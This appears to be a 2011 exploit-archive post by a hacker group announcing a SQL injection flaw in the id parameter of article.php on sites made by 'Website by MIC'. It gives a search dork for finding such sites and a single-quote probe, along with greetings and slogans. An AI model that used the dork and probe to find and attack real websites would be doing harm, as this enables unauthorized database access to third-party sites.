id: 15515
date: 02/26/2011
title: Website by MIC Sql Injection Vulnerability
author: eXeSoul
cves: 

#########################################################################
  
[+] Exploit Title : Website by MIC [ Sql Injection Vulnerability]
[+] Author : eXeSoul
[+] Contact : exe.soul@live.com
[+] Date : 25-02-2011
[+] category: Web Apps [SQli]
[+] HomePage : www.indishell.in
[+] Version : all
[+] Tested on : windows/linux 
[+] Vulnerability Style : PHP [ Sql Injection Vunerability ]
[+] Vendor: http://www.macmillanweb.com
[+] VCE: ()
[+] Dork :  "Website by MIC"
#########################################################################

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
<3 Love: -[SiLeNtp0is0n]-, stRaNgEr(lucky), inX_rOot, NEO H4cK3R, DarkL00k, Th3 RDX, G00g!3 W@rr!0r, Nazz ,
r45c4l, str1k3r, co0Lt04d , ATUL DWIVEDI , Jackh4xor , Bon3 ,Badboy-Albinia, Mr.SK , I-H Guru,
X__HMG, AK-47
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 
 
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                           ......\m/ INDIAN CYBER ARMY \m/......
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Vulnerability:
  
*SQL injection Vulnerability*
 
 
http://server/article.php?id='20090909150812
http://server/article.php?id=[SQli]

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=> PROUD TO BE AN INDIAN | Anythning for INDIA | JAI-HIND | Maa Tujhe Salam
   
=> c0d3 for motherland, h4ck for motherland
  
 
      
     Enj0y! :D
 
 
[#] DOne now time to rock \m/
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



#  0day.today [2023-03-25]  #